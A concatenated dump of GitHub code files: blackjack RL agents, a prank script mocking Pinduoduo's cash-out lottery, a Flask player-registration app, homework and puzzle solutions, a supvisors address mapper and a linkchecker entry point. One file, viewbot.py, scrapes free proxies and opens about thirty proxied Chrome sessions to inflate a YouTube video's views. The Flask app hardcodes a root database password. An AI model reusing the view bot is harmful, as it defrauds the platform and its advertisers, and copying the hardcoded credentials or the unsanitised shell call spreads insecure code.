Estimate the value of the states that the agent experiences. \n 1. Generate episode using the policy\n 2. For each state appeared in the episode keep the return following the first\n occurence and average the Returns of each state visited in this episode. \"\"\"\n for _ in range(total_episodes):\n episode_states = [] # the states that will be visited in the current episode\n episode_rewards = [] # the rewards of the episode\n\n env.init_episode()\n while not env.episode_finished:\n s = env.get_state()\n state = self.States.index(s)\n action = self.policy[state]\n reward = env.player_action(action)\n episode_rewards.append(reward)\n episode_states.append(state)\n\n self.update_values(episode_states, episode_rewards)\n\nclass TD0(object):\n States = []\n for s in range(12, 22):\n for d in range(1, 11):\n for a in range(2):\n state = ''\n if d == 1:\n state += 'A'\n else:\n state += str(d)\n \n state += ' ' + str(s) + ' ' + str(a)\n States.append(state)\n K = len(States)\n\n def __init__(self):\n # The default policy to be evaluated is sticking only on 20 or 21\n self.policy = ['hit' for i in range(self.K)]\n self.policy[-40:] = ['stick' for i in range(40)]\n\n self.V = np.zeros(self.K)\n self.Returns = [[] for s in range(self.K)]\n\n def train(self, env, total_episodes, a, discount_rate):\n \"\"\" Estimate the value of the states that the agent experiences. \n 1. Generate episode using the policy\n 2. For each state visited, take action a acording to policy.\n 3. Observe the reward and the next state.\n 4. Update the value of the state. \"\"\"\n for _ in range(total_episodes):\n env.init_episode()\n s = env.get_state()\n state = self.States.index(s)\n while not env.episode_finished:\n action = self.policy[state]\n reward = env.player_action(action)\n if not env.episode_finished:\n next_s = env.get_state()\n next_state = self.States.index(next_s)\n dV = a * (reward + discount_rate * self.V[next_state] - self.V[state])\n self.V[state] += dV\n state = next_state\n else:\n dV = a * (reward - self.V[state])\n self.V[state] += dV\n\nif __name__ == \"__main__\":\n from environment.Env import Env\n\n env = Env()\n agent = TD0()\n\n agent.train(env, 5 * 10**4, 0.1, 1)\n for i in range(200):\n print('state: ',TD0.States[i])\n print('V(s): ', agent.V[i])","repo_name":"georgetz15/ai","sub_path":"ReinforcementLearning/BlackJack/Agents.py","file_name":"Agents.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21333726959","text":"import time\nimport sys\nfrom datetime import datetime\n\nttttt=0.7\n\ndef end():\n\tprint('\\n没想到...你真的...NB!!!')\n\ndef level_1():\n\tmoney=[25,50,100,300,500]\n\tfour=4\n\tmn=[]\n\twhile 0<=four:\n\t\tprint('你还有'+'\\033[35m'+str(four+3)+'\\033[0m'+'次抽奖机会!\\n\\n')\n\t\tright=input('是/否(y/n)继续抽奖:')\n\t\tif right=='y':\n\t\t\tprint('\\n\\n正在抽奖...')\n\t\t\ttime.sleep(ttttt)\n\t\t\tprint('你抽到了'+'\\033[32m'+str(money[four])+'\\033[0m'+'元!')\n\t\t\tmn.append(money[four])\n\t\t\tprint('累积'+'\\033[36m'+str(sum(mn))+'\\033[0m'+'元!')\n\t\tif right=='n':\n\t\t\tnr='再考虑考虑?'\n\t\t\tzero=1\n\t\t\twhile zero<=10:\n\t\t\t\tprint(nr*zero)\n\t\t\t\ttime.sleep(ttttt)\n\t\t\t\tzero+=1\n\t\t\tsys.exit(1)\n\t\tfour-=1\n\ndef level_2():\n\tmoney=975\n\tgive=[2.5,5]\n\ttimes=2\n\treq=1\n\tmn=[975]\n\twhile 0<=req:\n\t\tprint('你还有'+'\\033[35m'+str(req+1)+'\\033[0m'+'次抽奖机会!\\n\\n')\n\t\tright=input('是/否(y/n)继续抽奖:')\n\t\tif right=='y':\n\t\t\tprint('\\n\\n正在抽奖...')\n\t\t\ttime.sleep(ttttt)\n\t\t\tprint('你抽到了'+'\\033[32m'+str(give[req])+'\\033[0m'+'元!')\n\t\t\tprint('你真幸运!拼多多为你助力翻倍 ==> 获得'+'\\033[32m'+str(give[req]*times)+'\\033[0m'+'元!')\n\t\t\tmn.append(give[req]*times)\n\t\t\tprint('累积'+'\\033[36m'+str(sum(mn))+'\\033[0m'+'元!')\n\t\tif right=='n':\n\t\t\tnr='再考虑考虑?'\n\t\t\tzero=1\n\t\t\twhile zero<=10:\n\t\t\t\tprint(nr*zero)\n\t\t\t\ttime.sleep(ttttt)\n\t\t\t\tzero+=1\n\t\t\tsys.exit(1)\n\t\treq-=1\n\ndef level_3():\n\tprint('抽奖次数用完!拼多多为你助力,送你3次机会!')\n\tprint('你还有'+'\\033[35m'+str(3)+'\\033[0m'+'次抽奖机会!\\n\\n')\n\tright=input('是/否(y/n)继续抽奖:')\n\tif right=='y':\n\t\tprint('\\n\\n正在抽奖...')\n\t\ttime.sleep(ttttt)\n\t\tprint('你抽到了'+'\\033[32m'+str(1)+'\\033[0m'+'元!')\n\t\tprint('你真幸运!拼多多为你助力翻8倍 ==> 获得'+'\\033[32m'+str(8)+'\\033[0m'+'元!')\n\t\tprint('累积'+'\\033[36m'+str(990+8)+'\\033[0m'+'元!')\n\tif right=='n':\n\t\t\tnr='再考虑考虑?'\n\t\t\tzero=1\n\t\t\twhile zero<=10:\n\t\t\t\tprint(nr*zero)\n\t\t\t\ttime.sleep(ttttt)\n\t\t\t\tzero+=1\n\t\t\tsys.exit(1)\n\tprint('你还有'+'\\033[35m'+str(2)+'\\033[0m'+'次抽奖机会!\\n\\n')\n\trigt=input('是/否(y/n)继续抽奖:')\n\tif rigt=='y':\n\t\tprint('\\n\\n正在抽奖...')\n\t\ttime.sleep(ttttt)\n\t\tprint('你抽到了'+'\\033[32m'+str(100)+'\\033[0m'+'枚硬币!')\n\t\tprint('你真幸运!拼多多为你助力翻10倍 ==> 获得'+'\\033[32m'+str(1000)+'\\033[0m'+'枚硬币!')\n\t\tprint('1000枚硬币可兑换为1元!\\n累积'+'\\033[36m'+str(990+8+1)+'\\033[0m'+'元!')\n\t\tprint('你还有'+'\\033[35m'+str(1)+'\\033[0m'+'次抽奖机会!\\n\\n')\n\tif rigt=='n':\n\t\t\tnr='再考虑考虑?'\n\t\t\tzero=1\n\t\t\twhile zero<=10:\n\t\t\t\tprint(nr*zero)\n\t\t\t\ttime.sleep(ttttt)\n\t\t\t\tzero+=1\n\t\t\tsys.exit(1)\n\ndef level_4():\n\tmoney=999\n\tcoin=990\n\trigt=input('是/否(y/n)继续抽奖:')\n\tif rigt=='y':\n\t\tprint('\\n\\n正在抽奖...')\n\t\ttime.sleep(ttttt)\n\t\tprint('你抽到了'+'\\033[32m'+str(99)+'\\033[0m'+'枚硬币!')\n\t\tprint('你真幸运!拼多多为你助力翻10倍 ==> 获得'+'\\033[32m'+str(990)+'\\033[0m'+'枚硬币!')\n\t\tprint('1000枚硬币可兑换为1元!\\n你还剩'+'\\033[36m'+str(10)+'\\033[0m'+'枚硬币!')\n\t\tprint('你还有'+'\\033[35m'+str(0)+'\\033[0m'+'次抽奖机会!\\n\\n')\n\tif rigt=='n':\n\t\t\tnr='再考虑考虑?'\n\t\t\tzero=1\n\t\t\twhile zero<=10:\n\t\t\t\tprint(nr*zero)\n\t\t\t\ttime.sleep(ttttt)\n\t\t\t\tzero+=1\n\t\t\tsys.exit(1)\n\ndef can(al):\n\ttimes=1\n\tcoin=[1]\n\tres=[]\n\twhile True:\n\t\tif sum(res)>=al:\n\t\t\tprint('\\n\\033[31m恭喜你成功提现!!\\033[0m')\n\t\t\tend()\n\t\t\tsys.exit(1)\n\t\telse:\n\t\t\tgl=1.5/times\n\t\t\tres.append(gl)\n\t\t\tremain=10-sum(res)\n\t\t\tprint('\\n\\n请邀请微信用户助力继续抽奖吧!')\n\t\t\tr=input('是/否(y/n)已助力:')\n\t\t\tif r=='y':\n\t\t\t\tprint('\\n\\n正在抽奖...')\n\t\t\t\ttime.sleep(ttttt)\n\t\t\t\tprint('你抽到了'+'\\033[32m'+str(gl)+'\\033[0m'+'枚硬币!')\n\t\t\t\tprint('还剩'+'\\033[35m'+str(remain)+'\\033[0m'+'枚硬币即可提现1000元!')\n\t\t\tif r=='n':\n\t\t\t\tnr='再考虑考虑?'\n\t\t\t\tzero=1\n\t\t\t\twhile zero<=10:\n\t\t\t\t\tprint(nr*zero)\n\t\t\t\t\ttime.sleep(ttttt)\n\t\t\t\t\tzero+=1\n\t\t\t\tsys.exit(1)\n\t\ttimes+=1\nprint('拼多多送你\\033[31m现金红包\\033[0m啦!\\n\\n')\ntime.sleep(ttttt)\nmode=input('请选择打款方式:\\n1. 微信支付\\n2. 支付宝支付\\n:')\ndef chck(mode):\n\tif mode=='1':\n\t\treturn '微信'\n\telse:\n\t\treturn '支付宝'\nprint('\\n=======================================\\n你最幸运!抽到了\\033[32m'+chck(mode)+'打款1000元\\033[0m(有机会)!\\n=======================================\\n')\ntime.sleep(ttttt)\nprint('\\n===============================\\n你是\\033[35m新用户\\033[0m,抽奖次数加2\\n')\ntime.sleep(ttttt)\nprint('你\\033[35m周围的用户\\033[0m抽中过奖,抽奖次数加3\\n')\ntime.sleep(ttttt)\nprint('你在\\033[35m幸运星期'+str(datetime.today().weekday()+1)+'\\033[0m抽奖,抽奖次数加2\\n===============================\\n')\ntime.sleep(ttttt)\nlevel_1()\nlevel_2()\nlevel_3()\nlevel_4()\ncan(10)","repo_name":"wzk0/pdd_demo","sub_path":"pdd.py","file_name":"pdd.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26648857538","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for\nfrom flask import redirect\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI']='mysql+pymysql://root:12345@localhost/cadjogadores'\ndb = SQLAlchemy(app)\n\n\nclass cadjogadores(db.Model):\n __tablename__ = 'jogadores'\n _id = db.Column(db.Integer,primary_key=True,autoincrement=True)\n nome = db.Column(db.String(50))\n idade = db.Column(db.Integer())\n posicao = db.Column(db.String(30))\n altura = db.Column(db.Float(5))\n peso = db.Column(db.Float(5))\n def __init__(self, nome, idade, posicao, altura, peso):\n self.nome = nome\n self.idade = idade\n self.posicao = posicao\n self.altura = altura\n self.peso = peso\n\ndb.create_all()\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/pontuacao\")\ndef pontuacao():\n return render_template(\"pontuacao.html\")\n\n@app.route(\"/time\")\ndef times():\n return render_template(\"time.html\")\n\n@app.route(\"/jogadores\")\ndef jogadores():\n return render_template(\"jogadores.html\")\n\n@app.route(\"/cadastro\")\ndef cadastro():\n return render_template(\"cadastro.html\")\n\n@app.route(\"/cadastrar\", methods=['GET','POST'])\ndef cadastrar():\n if request.method ==\"POST\":\n nome = (request.form.get(\"nome\"))\n idade = (request.form.get(\"idade\"))\n posicao = (request.form.get(\"posicao\"))\n altura = (request.form.get(\"altura\"))\n peso = (request.form.get(\"peso\"))\n if nome:\n f = cadjogadores(nome,idade,posicao,altura,peso)\n db.session.add(f)\n db.session.commit()\n return redirect(url_for(\"cadastro\"))\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Lucas-Mendes04/AC05_Desenvolvimento","sub_path":"principal.py","file_name":"principal.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13423712016","text":"# Задача 4- Электричка отправляется в h1:m1 и едет h2:m2. Выведите время прибытия электрички на\n#электронных часах в формате hh:mm.Формат входных данных: на одной строке h1:m1, на другой h2:m2\nimport datetime\n\nh1m1 = input('Input the departure time (format HH:MM, e.g. 13:30)... ')\nh2m2 = [int(i) for i in (input('Input the time on the way (format HH:MM, e.g. 13:30)... ').split(':'))] \n\ndeparture = datetime.datetime.strptime(h1m1, '%H:%M')\nway = datetime.timedelta(hours=h2m2[0], minutes=h2m2[1]) \narrival = departure + way\n\nprint(f\"Arrival time is {arrival.strftime('%H:%M')}\")","repo_name":"DmitryDemidovets/Homeworks","sub_path":"HW4 18.12/4. h1m1.py","file_name":"4. h1m1.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24850024907","text":"two_data = open(\"2\", \"r\")\nlines = two_data.readlines()\n\nscores = {\n \"A X\" : 4, # Rock / Rock / Draw\n \"A Y\" : 8, # Rock / Paper / Win\n \"A Z\" : 3, # Rock / Scissors / Loss\n \"B X\" : 1, # Paper / Rock / Loss\n \"B Y\" : 5, # Paper / Paper / Draw\n \"B Z\" : 9, # Paper / Scissors / Win\n \"C X\" : 7, # Scissors / Rock / Win\n \"C Y\" : 2, # Scissors / Paper / Loss\n \"C Z\" : 6, # Scissors / Scissors / Draw\n}\n\nstrategies = {\n \"A X\" : 3, # Rock / Lose (Scissors)\n \"A Y\" : 4, # Rock / Draw (Rock)\n \"A Z\" : 8, # Rock / Win (Paper)\n \"B X\" : 1, # Paper / Lose (Rock)\n \"B Y\" : 5, # Paper / Draw (Paper)\n \"B Z\" : 9, # Paper / Win (Scissors)\n \"C X\" : 2, # Scissors / Lose (Paper)\n \"C Y\" : 6, # Scissors / Draw (Scissors)\n \"C Z\" : 7, # Scissors / Win (Rock)\n}\n\nscore = 0\nstrategy = 0\nfor line in lines:\n stripped = line.strip(\"\\n\") # get rid of any new lines\n score += scores[stripped]\n strategy += strategies[stripped]\n\nprint(\"Puzzle One: \" + str(score))\nprint(\"Puzzle Two: \" + str(strategy))\n\ntwo_data.close()","repo_name":"mr-velse/AoC2022","sub_path":"DayTwo.py","file_name":"DayTwo.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33948506168","text":"from socket import gethostname\nfrom collections import OrderedDict\n\n\nclass AddressMapper(object):\n \"\"\" Class used for storage of the addresses defined in the configuration file.\n These addresses are expected to be host names or IP addresses where a Supvisors instance is running.\n The instance holds:\n - logger: a reference to the common logger,\n - addresses: the list of addresses defined in the Supvisors configuration file,\n - local_addresses: the list of known aliases of the current host, i.e. the host name and the IPv4 addresses,\n - local_address: the usage name of the current host, i.e. the name in the known aliases that corresponds to an address of the Supvisors list. \"\"\"\n\n def __init__(self, logger):\n \"\"\" Initialization of the attributes. \"\"\"\n # keep reference of common logger\n self.logger = logger\n # init\n self._addresses = []\n self.local_addresses = [gethostname()] + self.ipv4()\n self.local_address = None\n\n @property\n def addresses(self):\n \"\"\" Property for the 'address' attribute.\n The setter stores the addresses of the configuration file and determine the usage name of the local address. \"\"\"\n return self._addresses\n\n @addresses.setter\n def addresses(self, addr):\n self.logger.info('Expected addresses: {}'.format(addr))\n # store IP list as found in config file\n self._addresses = addr\n # get IP list for local board\n self.local_address = self.expected(self.local_addresses)\n self.logger.info('Local addresses: {} - Local address: {}'.format(self.local_addresses, self.local_address))\n \n def valid(self, address):\n \"\"\" Return True if address is among the addresses defined in the configuration file. \"\"\"\n return address in self._addresses\n\n def filter(self, address_list):\n \"\"\" Returns a list of expected addresses from a list of names or ip addresses identifying different locations. \"\"\"\n # filter unknown addresses\n addresses = [address for address in address_list if self.valid(address)]\n # remove duplicates keeping the same ordering\n return list(OrderedDict.fromkeys(addresses))\n\n def expected(self, address_list):\n \"\"\" Returns the expected address from a list of names or ip addresses identifying the same location. \"\"\"\n return next((address for address in address_list if self.valid(address)), None)\n\n @staticmethod\n def ipv4():\n \"\"\" Get all IPv4 addresses for all interfaces. \"\"\"\n try:\n from netifaces import interfaces, ifaddresses, AF_INET\n # to not take into account loopback addresses (no interest here)\n addresses = []\n for interface in interfaces():\n config = ifaddresses(interface)\n # AF_INET is not always present\n if AF_INET in config.keys():\n for link in config[AF_INET]:\n # loopback holds a 'peer' instead of a 'broadcast' address\n if 'addr' in link.keys() and 'peer' not in link.keys():\n addresses.append(link['addr']) \n return addresses\n except ImportError:\n return []\n\n","repo_name":"danh1979/supvisors","sub_path":"supvisors/addressmapper.py","file_name":"addressmapper.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"23254099021","text":"# analysis_module.py\n\n# Other necessary imports\nimport pandas as pd\n\nfrom analysis.evaluate_recommendation import evaluate_recommendation, get_actual_price_changes\n# Import necessary functions from the 'analysis' module\nfrom analysis.evaluation_function import evaluate_performance, get_last_percentage_change\nfrom analysis.make_recommendation import make_recommendation, get_price_trend, get_market_sentiment\nfrom analysis.track_performance import track_performance\n\n\ndef analysis_pipeline():\n # Read historical data from CSV file\n historical_data = pd.read_csv('data/historical_data.csv')\n\n # Evaluate performance and calculate indicators\n indicators = evaluate_performance(historical_data)\n\n # Calculate the last percentage change in price\n last_percentage_change = get_last_percentage_change(historical_data)\n\n # Get price trend and market sentiment\n price_trend = get_price_trend(historical_data)\n market_sentiment = get_market_sentiment(historical_data)\n\n # Make a recommendation based on indicators\n recommendation = make_recommendation(current_price)\n\n # Get actual price changes\n actual_price_changes = get_actual_price_changes(historical_data)\n\n # Evaluate the recommendation\n evaluation = evaluate_recommendation(current_price)\n\n # Track the performance\n past_recommendations = []\n track_performance(evaluation, past_recommendations)\n\n\n# Run the analysis pipeline\nif __name__ == \"__main__\":\n analysis_pipeline()\n","repo_name":"tsanford01/BitcoinAnalyzer","sub_path":"analysis_module.py","file_name":"analysis_module.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19671164324","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.proxy import Proxy, ProxyType\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nimport numpy\nimport socket\nimport pylint\nimport os\nimport re\nimport time\nfrom selenium.webdriver.support.select import Select\nimport threading\nimport random\n\nPATH = \"C:\\Program Files (x86)\\chromedriver.exe\"\nprefs = {\"profile.managed_default_content_settings.images\": 2}\niplist = []\noptions = webdriver.ChromeOptions()\ndriverarray = []\nnbrofChrome = 30\n\n\ndef get_PROXY(): #RENVOI UNE LIST DE PROXY EN 8080\n #RECUPERE UNE LISTE DE PROXY\n PROXYPATH = \"https://spys.one/free-proxy-list/FR/\"\n proxyDriver = webdriver.Chrome(PATH)\n proxyDriver.get(PROXYPATH)\n time.sleep(3)\n #PREPARATION DE LA PAGE POUR 500 ELEMENT PORT 8080\n portelement = Select(proxyDriver.find_element_by_name(\"xf4\"))\n portelement.select_by_visible_text(\"8080\")\n time.sleep(3)\n showelement = Select(proxyDriver.find_element_by_name(\"xpp\"))\n showelement.select_by_visible_text(\"500\")\n time.sleep(3)\n proxyDriver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(3)\n ipelement = proxyDriver.find_elements_by_class_name(\"spy14\")\n\n i = 0\n #ON NE RECUPERE QUE LES ADRESSE DANS IPLIST\n line = \"\"\n r = re.compile(r'[0-9]+(?:\\.[0-9]+){3}:8080')\n for line in ipelement:\n if (r.match(line.text)):\n iplist.append(line.text)\n\n\n print(\"FOUND \"+ str(len(iplist))+ \" PROXY\")\n proxyDriver.close()\n\ndef clean_PROXY():\n\n for line in iplist:\n ip = line.split(\":\")[0]\n print(ip)\n response = os.system(\"ping -n 1 \" + ip)\n if response == 0:\n print(\" STATUS = OK\")\n else:\n iplist.remove(line)\n print(\" STATUS = REJECTED\")\n print(\"FOUND \"+ str(len(iplist))+ \" GOOD PROXY\")\n\n\ndef go_VIDEO(crDriver):\n video = \"https://www.youtube.com/watch?v=x9_KhDiD_oA\"\n \n while True: \n try:\n crDriver.get(video)\n break\n except Exception as e:\n driverarray.remove(crDriver)\n crDriver.close()\n print(e)\n\n random.seed(a=None, version=2)\n rd = random.randint(0,len(iplist)-1)\n\n options.add_experimental_option(\"prefs\", prefs)\n options.add_argument('--proxy-server=%s' % iplist[rd])\n crDriver = webdriver.Chrome(PATH, chrome_options = options) #creation du driver avec proxy\n driverarray.append(crDriver)\n\n return \n\n\nget_PROXY()\nclean_PROXY()\n\n\n\ni = 0\nj = 0\nwhile (i len(iplist)):\n j=0\n i = i+1\n\n\ntime.sleep(1)\n\n\nthreeadlist = []\n\nfor crDriver in driverarray:\n crThread = threading.Thread(target=go_VIDEO, args=[crDriver])\n crThread.start()\n threeadlist.append(crThread)\n\n \ntime.sleep(100)","repo_name":"ForerunnerofRivia/BotYoutube","sub_path":"viewbot.py","file_name":"viewbot.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73256183849","text":"from flask.views import MethodView\nfrom flask import request,jsonify,current_app\nfrom .. import responses\nfrom ...models.cs_models import SensorGroup\nfrom ... import r,oauth\nfrom ..helper import xstr,get_building_choices\nimport sys\n\nclass SensorGroupService(MethodView):\n\n @oauth.require_oauth()\n def post(self):\n \"\"\"\n Args as data:\n name = \n description = \n building = \n\n Returns (JSON) :\n {\n \"success\" : \n \"error\" : \n }\n \"\"\"\n try:\n data = request.get_json()\n name = data['name']\n building = data['building']\n description = data['description']\n except KeyError:\n return jsonify(responses.missing_parameters)\n\n sensor_group = SensorGroup.objects(name=name).first()\n if sensor_group:\n return jsonify(responses.sensorgroup_exists)\n\n # Get the list of buildings and verify that the one specified in the\n # request exists\n buildings_list = get_building_choices('rest_api')\n for item in buildings_list:\n if building in item:\n SensorGroup(name=xstr(name), building=xstr(building),\n description=xstr(description)).save()\n return jsonify(responses.success_true)\n\n return jsonify(responses.invalid_building)\n\n @oauth.require_oauth()\n def get(self,name):\n \"\"\"\n Args as data:\n name = \n Returns (JSON):\n {\n \"success\" : \n \"error\" : \n \"building\" : \n \"description\" : < description attached to sensor group\"\n }\n \"\"\"\n sensor_group = SensorGroup.objects(name=name).first()\n if sensor_group is None:\n return jsonify(responses.invalid_sensorgroup)\n\n response = dict(responses.success_true)\n response.update({\"name\":sensor_group['name'],\n \"building\":sensor_group['building'],\n \"description\":sensor_group['description']})\n return jsonify(response)\n","repo_name":"Entromorgan/GIoTTo","sub_path":"BuildingDepot-v3.2.8/buildingdepot/CentralService/app/rest_api/sensorgroups/sensorgroup.py","file_name":"sensorgroup.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41858655606","text":"# [Simulation] 컨베이어 벨트 위의 로봇 - 백준 20055 삼성기출\nimport copy\n\n\nN, K = list(map(int,input().split()))\n\n\n# 내구도\nA = list(map(int,input().split()))\n\n\n\n# 로봇의 위치\nrobot = []\nprint(len(robot))\n\n\n# 벨트가 회전한다.\ndef lotation():\n\n temp = copy.deepcopy(A)\n\n for i in range(len(A)):\n\n nx = i + 1\n if(nx >= 2*N):\n nx = 0\n A[nx] = temp[i]\n\n #\n # for i in range(len(robot)):\n #\n # cx = robot[i][0]\n # nx = cx + 1\n #\n # if(cx == 0):\n # continue\n # if(nx >= 2*N + 1):\n # robot[i][0] = 0\n # continue\n # #nx = 0\n #\n #\n # # 다음칸의 내구도가 0이거나, 로봇이 있으면\n # if(A[nx] == 0):\n # continue\n # break_boolean = False\n # for j in range(len(robot)):\n # pre_robot = robot[j][0]\n # if(pre_robot == nx):\n # break_boolean = True\n # break\n # if(break_boolean == True):\n # continue\n #\n # robot[i][0] = nx\n # A[nx] = A[nx]-1\n # print('1 lotation robot =', robot)\n # print('1 lotation A=', A)\n\n\n# 올라가는 위치에 로봇이 없으면 로봇을 올린다\ndef makeRobot():\n make_boolean = True\n for i in range(len(robot)):\n if(robot[i][0]==1):\n make_boolean = False\n break\n\n if(make_boolean == True and A[1] > 0):\n robot.append([1])\n #if(A[1] > 0):\n A[1] = A[1] - 1\n print('2 makeRobot robot =', robot)\n\ndef chkA():\n print('3 makeRobot A=', A)\n cnt = 0\n global finish_boolean\n finish_boolean = False\n for i in range(len(A)):\n if(A[i] == 0):\n cnt += 1\n print('cnt=',cnt)\n if(cnt >= K):\n finish_boolean = True\n break\n\n\nfinish_boolean = False\nresult = 0\n\nwhile(finish_boolean == False):\n print('result =',result)\n lotation()\n makeRobot()\n chkA()\n result += 1\n print('--------')\n\n\nprint(result - 1)\n\n","repo_name":"908jyw/pythonAlgorithm","sub_path":"simulation/robotOnConveyerBelt.py","file_name":"robotOnConveyerBelt.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30652879463","text":"import numpy as np\n\nimport sys\n\nsys.path += [\"layers\"]\nsys.path += [\"pyc_code\"]\n\nfrom fn_conv import fn_conv\nfrom fn_flatten import fn_flatten\nfrom pyc_code.fn_linear_ import fn_linear\nfrom fn_pool import fn_pool\nfrom fn_relu import fn_relu\nfrom pyc_code.fn_softmax_ import fn_softmax\n\n\ndef calc_gradient(model, input, layer_acts, dv_output):\n \"\"\"\n Calculate the gradient at each layer, to do this you need dv_output\n determined by your loss function and the activations of each layer.\n The loop of this function will look very similar to the code from\n inference, just looping in reverse.\n Args:\n model: Dictionary holding the model\n input: [any dimensions] x [batch_size]\n layer_acts: A list of activations of each layer in model[\"layers\"]\n dv_output: The partial derivative of the loss with respect to each element in the output matrix of the last layer.\n Returns:\n grads: A list of gradients of each layer in model[\"layers\"]\n \"\"\"\n num_layers = len(model[\"layers\"])\n grads = [\n None,\n ] * num_layers\n\n # TODO: Determine the gradient at each layer.\n # Remember that back-propagation traverses\n # the model in the reverse order.\n layers = model[\"layers\"]\n\n new_dv_output = dv_output\n for i in np.flip(range(num_layers)):\n if i > 0:\n activations = layer_acts[i - 1]\n else:\n activations = input\n\n def conv():\n # print(\"Conv activations:\", activations)\n # print(\"Conv dv_output:\", new_dv_output)\n grads = fn_conv(\n activations,\n layers[i][\"params\"],\n layers[i][\"hyper_params\"],\n backprop=True,\n dv_output=new_dv_output,\n )\n # print(\"Conv gradients:\", grads)\n return grads\n\n def flatten():\n return fn_flatten(\n activations,\n layers[i][\"params\"],\n layers[i][\"hyper_params\"],\n backprop=True,\n dv_output=new_dv_output,\n )\n\n def linear():\n return fn_linear(\n activations,\n layers[i][\"params\"],\n layers[i][\"hyper_params\"],\n backprop=True,\n dv_output=new_dv_output,\n )\n\n def pool():\n return fn_pool(\n activations,\n layers[i][\"params\"],\n layers[i][\"hyper_params\"],\n backprop=True,\n dv_output=new_dv_output,\n )\n\n def relu():\n return fn_relu(\n activations,\n layers[i][\"params\"],\n layers[i][\"hyper_params\"],\n backprop=True,\n dv_output=new_dv_output,\n )\n\n def softmax():\n return fn_softmax(\n activations,\n layers[i][\"params\"],\n layers[i][\"hyper_params\"],\n backprop=True,\n dv_output=new_dv_output,\n )\n\n switcher = {\n \"conv\": conv,\n \"flatten\": flatten,\n \"linear\": linear,\n \"pool\": pool,\n \"relu\": relu,\n \"softmax\": softmax,\n }\n\n def switch(type):\n return switcher.get(type)()\n\n _, new_dv_output, grads[i] = switch(layers[i][\"type\"])\n\n return grads\n","repo_name":"baroodya/cos429-a3","sub_path":"initial/calc_gradient.py","file_name":"calc_gradient.py","file_ext":"py","file_size_in_byte":3449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27030046635","text":"import os\nimport pprint\nimport signal\nimport sys\nimport traceback\n\nfrom .arg_parser import ArgParser\nfrom .setup_config import setup_config\n\nfrom .. import configuration\nfrom .. import fileutil\nfrom .. import log\nfrom .. import logconf\nfrom .. import LinkCheckerError\nfrom ..cmdline import aggregate_url, print_usage\nfrom ..director import console, check_urls, get_aggregate\nfrom ..logconf import LOG_CHECK, LOG_CMDLINE, LOG_THREAD\nfrom ..strformat import stripurl\n\n\ndef drop_privileges():\n \"\"\"Make sure to drop root privileges on POSIX systems.\"\"\"\n if os.name != 'posix':\n return\n if os.geteuid() == 0:\n log.warn(\n LOG_CHECK,\n _(\n \"Running as root user; \"\n \"dropping privileges by changing user to nobody.\"\n ),\n )\n import pwd\n\n os.seteuid(pwd.getpwnam('nobody')[3])\n\n\ndef linkchecker():\n if hasattr(signal, \"SIGUSR1\"):\n # install SIGUSR1 handler\n from ..decorators import signal_handler\n\n @signal_handler(signal.SIGUSR1)\n def print_threadstacks(sig, frame):\n \"\"\"Print stack traces of all running threads.\"\"\"\n log.warn(LOG_THREAD, \"*** STACKTRACE START ***\")\n for threadId, stack in sys._current_frames().items():\n log.warn(LOG_THREAD, \"# ThreadID: %s\" % threadId)\n for filename, lineno, name, line in traceback.extract_stack(stack):\n log.warn(\n LOG_THREAD,\n 'File: \"%s\", line %d, in %s' % (filename, lineno, name)\n )\n line = line.strip()\n if line:\n log.warn(LOG_THREAD, \" %s\" % line)\n log.warn(LOG_THREAD, \"*** STACKTRACE END ***\")\n\n logconf.init_log_config()\n\n # optional modules\n has_argcomplete = fileutil.has_module(\"argcomplete\")\n has_profile = fileutil.has_module(\"yappi\")\n has_meliae = fileutil.has_module(\"meliae\")\n\n # default profiling filename\n _profile = \"linkchecker.prof\"\n\n def read_stdin_urls():\n \"\"\"Read list of URLs, separated by white-space, from stdin.\"\"\"\n num = 0\n while True:\n lines = sys.stdin.readlines(8 * 1024)\n if not lines:\n break\n for line in lines:\n for url in line.split():\n num += 1\n if num % 10000 == 0:\n log.info(LOG_CMDLINE, \"Read %d URLs from stdin\", num)\n yield url\n\n # instantiate command line option parser\n argparser = ArgParser()\n\n # build a config object for this check session\n config = configuration.Configuration()\n config.set_status_logger(console.StatusLogger())\n\n # ================= auto completion =====================\n if has_argcomplete:\n import argcomplete\n\n argcomplete.autocomplete(argparser)\n\n # read and parse command line options and arguments\n options = argparser.parse_args()\n # configure application logging\n if options.debug:\n allowed_debugs = logconf.lognames.keys()\n for _name in options.debug:\n if _name not in 